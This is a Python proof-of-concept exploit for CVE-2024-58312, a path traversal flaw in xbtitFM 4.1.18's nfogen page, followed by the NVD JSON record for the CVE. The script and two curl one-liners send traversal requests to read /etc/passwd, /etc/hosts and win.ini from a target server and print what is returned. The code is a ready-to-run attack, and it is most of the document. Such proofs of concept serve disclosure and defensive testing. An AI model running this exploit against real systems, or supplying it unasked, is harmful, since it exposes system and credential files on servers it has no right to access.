CVE-2024-58312

import requests import urllib.parse # CVE-2024-58312 PoC - Path Traversal in xbtitFM 4.1.18 nfogen.php # Target: xbtitFM <= 4.1.18 # Type: Unauthenticated Path Traversal def exploit_path_traversal(target_url, file_to_read='/etc/passwd'): """ Exploit the path traversal vulnerability in xbtitFM nfogen.php Args: target_url: Base URL of the vulnerable xbtitFM installation file_to_read: Path to the file to read (default: /etc/passwd) Returns: Content of the requested file if exploitation succeeds """ # Encode path traversal sequence traversal = '../' * 6 # Go up multiple directory levels encoded_file = urllib.parse.quote(file_to_read) # Construct the malicious URL # nfogen.php is the vulnerable endpoint exploit_url = f"{target_url}/index.php?page=nfogen&name={traversal}{encoded_file}" print(f"[*] Target: {target_url}") print(f"[*] Attempting to read: {file_to_read}") print(f"[*] Exploit URL: {exploit_url}") try: # Send the malicious request response = requests.get(exploit_url, timeout=10, verify=False) if response.status_code == 200: print(f"[!] Exploitation successful!") print(f"[*] File content:") print(response.text) return response.text else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None # Example usage if __name__ == "__main__": target = "http://target-server.com/xbtitfm" # Read system files files_to_read = [ '/etc/passwd', '/etc/hosts', 'C:\\Windows\\win.ini' # For Windows targets ] for file_path in files_to_read: exploit_path_traversal(target, file_path) print("=" * 50) # Alternative PoC using curl: # curl 'http://target.com/index.php?page=nfogen&name=../../../../etc/passwd' # curl 'http://target.com/index.php?page=nfogen&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd'

{"cve": {"id": "CVE-2024-58312", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:52.790", "lastModified": "2025-12-30T19:51:08.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "xbtitFM 4.1.18 contains a path traversal vulnerability that allows unauthenticated attackers to access sensitive system files by manipulating URL parameters. Attackers can exploit directory traversal techniques to read critical system files like using encoded path traversal characters in HTTP requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xbtitfm:xbtitfm:4.1.18:*:*:*:*:*:*:*", "matchCriteriaId": "B8A361AE-CCCA-460B-98A8-E2E39DA52BAD"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51909", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/xbtitfm-unauthenticated-path-traversal-in-nfogenphp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xbtitfm.eu", "source": "[email protected]", "tags": ["Product"]}]}}